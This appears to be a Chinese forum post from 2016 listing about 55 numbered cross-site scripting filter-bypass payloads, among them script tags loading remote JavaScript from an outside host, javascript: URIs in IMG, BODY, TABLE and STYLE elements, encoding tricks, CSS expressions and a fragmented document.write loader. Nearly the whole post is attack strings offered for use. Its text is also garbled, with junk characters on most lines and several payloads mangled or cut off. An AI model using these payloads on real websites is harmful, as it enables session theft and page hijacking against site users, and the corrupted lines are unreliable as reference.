(1)普通的XSS JavaScript注入# ~, M8 l/ ]; ]: l4 ~0 M @( m8 T
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ X; B" j$ G/ G c9 G' P
(99)另类弹框
1 _3 Z7 B* @) @7 I. _/ I<q/oncut=alert()>15 e8 ~9 U" O+ Z, o" A
<s/onclick=alert()>b
" F; A8 S2 W7 |' O. m ]8 H <XSS=" onclick="alert(1)//">clickme</SSX=">2 \* z4 ^. D) _, b: `6 L' @, Q
<zzz onclick=alert`1`>clickme</zzz>
6 X8 F7 X1 ~- K X" ~/ Y <a onclick=alert`1`>clickme</a>. x) _ F9 x, j; e7 X& y
<a=">clickme</a=">/ o* @! |5 _! j2 F
<a=">clickme</a>( }' @# |" m* q7 z
<z=">clickme</z=">
/ J1 A9 ?, N; m3 o) A# j7 Z. X<z onclick=alert`1`>clickme</z>6 z( R, q, a3 P$ g( c
3 {9 d% C# K6 k- _& B
(2)IMG标签XSS使用JavaScript命令% ?) Z" b) q$ i7 c& D, V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. |) ~0 W0 q' y# R
7 ]6 B' U+ [' p3 J2 `1 q* V; K(3)IMG标签无分号无引号, ]; D* R) N* I% h5 P; k
<IMG SRC=javascript:alert(‘XSS’)>
( s9 Y- }% M4 r t
4 A6 w+ ~" ` }/ l8 B, {(4)IMG标签大小写不敏感+ X5 E( W5 ~( ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
3 O( [- ]( Z; M4 q' l" u
& u! Z" U( v% x- [' i7 z! H(5)HTML编码(必须有分号)
2 P, f# z# y3 j% K( \8 i2 C5 r<IMG SRC=javascript:alert(“XSS”)>
. K! B% e7 b$ X9 o M: a0 M
! L+ n! X! E' K* r(6)修正缺陷IMG标签- h( H* D1 O7 _; F
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>5 ^2 f+ p8 }7 b2 J) @" u
0 k6 O4 U# f6 f$ D; L
(7)formCharCode标签(计算器)! @ J+ ]* n- [- ~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( W% [( b1 i8 v/ S8 _+ K1 ?: a( W- X- o1 j+ k2 [1 G
(8)UTF-8的Unicode编码(计算器)# H* S) ]3 u& W; T1 p1 n) |3 `
<IMG SRC=jav..省略..S')>( g' O. E6 [# @5 v8 @6 M
2 ~/ ?, e9 G( {& @' }/ K- w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)( a* W m. q, f: S
<IMG SRC=jav..省略..S')>
$ }4 u) N8 P( i8 C+ B
$ }* i0 J [- k4 S# C- n# `/ p. Z4 t(10)十六进制编码也是没有分号(计算器)
7 U$ F5 q. k$ J' v<IMG SRC=\'#\'" /span>& P! O0 P! ]# J# @. j
4 ^3 g) _) [+ D# R: f! r( ?(11)嵌入式标签,将Javascript分开: ^, @) g1 @5 l" A' a! T
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 Y% @6 H' Y+ i6 C4 t; _3 R1 P$ }
% J6 a" T! P. I+ A* {6 Z* U/ R(12)嵌入式编码标签,将Javascript分开
c7 e$ F, S/ w. x. Z: o<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 d3 c( |( B" c3 r% y0 k5 ?1 ]- T \* N
(13)嵌入式换行符
- C* T1 L5 S) v: _% r) O8 z; ^<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 n+ j& P5 w) V3 ~& T- q, h* a$ Y6 Y* O7 o: p- b5 U# f1 r) T
(14)嵌入式回车
) }) D9 l/ u$ O% e2 b, u# Z2 `<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* }$ G7 o' j0 W0 r2 d0 j) H
z0 \& i% ^4 I! Y d* p
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 l: G' g' q& u1 U<IMG SRC=\'#\'" /span>1 R% }. D# w1 Q/ @
; N/ v# ~& I5 K- d+ z$ d
(16)解决限制字符(要求同页面) O/ e, \% ]. s, h& J. u) C
<script>z=’document.’</script> s+ r$ p- ?+ e5 K; a- _4 [
<script>z=z+’write(“‘</script>- E9 V+ R; d; p" x1 R( R
<script>z=z+’<script’</script>
6 o, J' ^2 U& N# a7 D3 R<script>z=z+’ src=ht’</script>+ y. w/ B* D5 L8 w' s3 W: J; ?
<script>z=z+’tp://ww’</script>; p, x/ |2 l. Q5 ]8 E8 J$ a
<script>z=z+’w.shell’</script>+ R* o1 I" C# C
<script>z=z+’.net/1.’</script>4 f4 ~! J3 L" _- u" g$ q( J0 J
<script>z=z+’js></sc’</script>5 }/ R+ h; Z2 t" A
<script>z=z+’ript>”)’</script>
& z2 C0 s1 N. K) k<script>eval_r(z)</script>
* [. Q, Q/ h& a6 L. U) W$ B; Y
* M! n) g0 f6 Q% l(17)空字符4 [& ]% q% P+ K9 f# y% U
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out9 h; L# D6 W, t I# n
" P; a( C" C7 a+ f. R
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ F- N7 X# _& ?+ n! J* K" P" n+ Mperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! _! r7 B: L- U: o- S; |7 i( t( X2 {/ b6 F- R7 J! p" w" E2 M3 K5 t
(19)Spaces和meta前的IMG标签
8 u3 Z4 Z. v7 n8 K3 v% ^<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>* x5 R0 j6 F/ J3 \/ P) k3 n
% ~+ ?/ c0 j' W5 D(20)Non-alpha-non-digit XSS
! T% A" V. U; g. O; z<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
( y7 _: S. X/ a8 H8 g! @0 }, ^9 R. y/ r
(21)Non-alpha-non-digit XSS to 2* W5 b# K3 ]: B% c& m- G% g1 m
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
" i6 }0 }0 N3 [8 w: l# u' y6 B
7 A3 s4 j$ H* V0 F- B(22)Non-alpha-non-digit XSS to 3$ k1 P" h( H- X( O. [
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT># R2 D) z; H& V! O. C
5 x0 ^% O( }* w/ i# M' I(23)双开括号
5 U0 y3 C ]8 U. P<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 T; W( a5 v( Y: v
% ?! s8 E) y! A* E
(24)无结束脚本标记(仅火狐等浏览器)
1 x. a3 ^. ]; j" g2 h<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: s5 Y! J& j$ Q- a( z% }
8 i0 o% f' v8 e* m
(25)无结束脚本标记2
/ [! F% J" `- e<SCRIPT SRC=//3w.org/XSS/xss.js>5 {# p6 w; G t' N6 Z7 E7 S
+ i& I6 o/ Y$ h5 t/ ?4 Q% S; z9 h(26)半开的HTML/JavaScript XSS
) k' J8 W8 U% @# r2 \& o7 s<IMG SRC=\'#\'" /span>
3 v4 f( M# r* M* c5 \& \
4 C- H8 X! C% f* _$ b) T- p' ^3 W% W% h(27)双开角括号
) o- t- G, _3 U! l6 Q% F<iframe src=http://3w.org/XSS.html <2 {4 ?6 N1 j2 c+ [
. W, u. {1 ?- B0 W+ P9 z
(28)无单引号 双引号 分号
& d1 }* p8 Q- l( L$ x' s( ?$ Z<SCRIPT>a=/XSS/. T# z4 r6 s; u& b
alert(a.source)</SCRIPT>
r8 _5 ^- H. I. J0 }- Y" N7 I
/ }9 {. A* |+ f+ Y(29)换码过滤的JavaScript
; R8 p k$ a$ ^\”;alert(‘XSS’);//
, ]5 Q. ?7 R4 F( q, M |7 x1 C: |# ]) p
( M6 S3 t. g5 F- w& a(30)结束Title标签 }* Q# A/ W8 i+ i D
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. G; e/ R! n1 K! `5 C9 u! q) s8 G3 N6 c* _% l8 w# M6 d
(31)Input Image
6 Z+ g8 H; N2 z* g: G# B( O<INPUT SRC=\'#\'" /span>+ V" Z7 f9 e1 x: Y9 Q
3 k, q& n3 L1 g(32)BODY Image |! w- r/ }) {( b( Y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. r, a& j- G7 L4 S* N e& q2 H$ U$ f7 E$ p* P3 t4 `
(33)BODY标签1 _; N7 G' k$ y$ @' Z3 c
<BODY(‘XSS’)>- X' b8 N: i. |, o
! I4 e, O' R/ q w% n9 P
(34)IMG Dynsrc
! v- H( c4 Y, c1 P& K: |6 G<IMG DYNSRC=\'#\'" /span>& ?$ j2 ~+ |! Z' D a, I! x
) E* ^2 z; q% S3 y, E' V
(35)IMG Lowsrc. c1 R2 w c5 ?/ v
<IMG LOWSRC=\'#\'" /span>) \2 i' t! o: G; b @/ L
$ o) f' b' ]) E$ u9 e(36)BGSOUND
* x5 h7 Q! O" {& Y& @2 c<BGSOUND SRC=\'#\'" /span>
I' e/ O% v& z3 P5 `* a/ r8 j2 ^, J* x. O% w L
(37)STYLE sheet
, f8 E9 ]/ C( O% Z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" G \: a5 Z# I% J0 Q3 }, I, e/ l3 D6 ~* o& Q, q6 H( n
(38)远程样式表
1 j0 f. m" r& M5 q<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) F" K) E `: `1 Y9 r
. i5 b( u* R S% |1 @, _. j" c
(39)List-style-image(列表式)
8 M$ L. S0 q9 |1 m9 g, Z<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS. }: }3 m! U( m. t o; r. F5 Z
% [% W4 \1 t; W2 D/ t' ]
(40)IMG VBscript# `. l, Z0 D/ `/ C; o
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS* a2 w% \+ m* Z; Y9 B1 S
5 Q7 l; [& B) H1 E# g
(41)META链接url
- k0 X; s. h% j7 Y5 Y+ ~<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 D" t2 ?* ^) _) T4 ?: o& y
) ~/ H, J) s7 Y( {- r" u(42)Iframe# T# X4 w1 j4 h4 ~2 o7 q
<IFRAME SRC=\'#\'" /IFRAME>6 ^$ j% p& |" w: ?1 f, D. N" y
& m3 U5 S4 [: T4 k6 C) J: _
(43)Frame3 a7 K- g% J. }1 v0 u
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
8 N, v- u5 b) ~! O4 |, g" G' b1 F/ x/ o
(44)Table. ~+ S9 h! d( x% R+ R3 a
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 L# y J5 I- s9 R s L- ~" I# R/ ], i4 `. u, S/ c
(45)TD
: _! M C, r" @) Z<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 n% e2 d8 f. W- U5 {- V4 |; [1 P; w' J: m1 Z
(46)DIV background-image
. A' H/ Q6 v L/ a<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- E: R0 [; `1 c6 R
/ o0 T* s8 z1 t1 B9 g(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
- R8 D8 l& D, Q" x/ ^<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>9 F" m& t, n" B& x& |, x* G
* F+ ]2 a3 n: \# u+ |
(48)DIV expression
3 N9 n5 ~# @6 t+ {; `+ R( k<DIV STYLE=”width: expression_r(alert(‘XSS’));”>6 b6 i! `7 ~8 q
! H+ M0 j* _. \" ^: [(49)STYLE属性分拆表达" O# n$ w0 W/ p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% e# v3 a& t# i9 W4 W' m9 i, I! M8 X# s3 f5 }% I9 a: f
(50)匿名STYLE(组成:开角号和一个字母开头); s- f. Y( Y0 Z$ x
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 k m- G( c2 p# i8 C
( B+ B2 `. |* N8 v(51)STYLE background-image( U( J- s# `$ c. j
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>8 d+ S8 {+ ]) b0 s" t+ t2 @
; f) @- P" y; B% V+ r% `7 g
(52)IMG STYLE方式 O M- B, Z# l, r7 R6 }
exppression(alert(“XSS”))’>
7 C; F' d% H% T
! ?: e" v. P; q* H, ]: @(53)STYLE background* I6 r7 ^# `, u
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) q& x5 p1 a2 w2 ~
; o* p1 t: y! D: X6 l! F/ r" ](54)BASE
$ v" O: U' Z' x& E/ L; k+ `4 z- w" Y<BASE HREF=”javascript:alert(‘XSS’);//”>6 \( W+ K9 O6 ]3 w2 m
" d9 R; u4 i0 P9 n(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( t- D0 w N g
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>% f! ~7 v1 \: F$ a
|
发表于 2016-4-28 10:06:15
收藏
支持
反对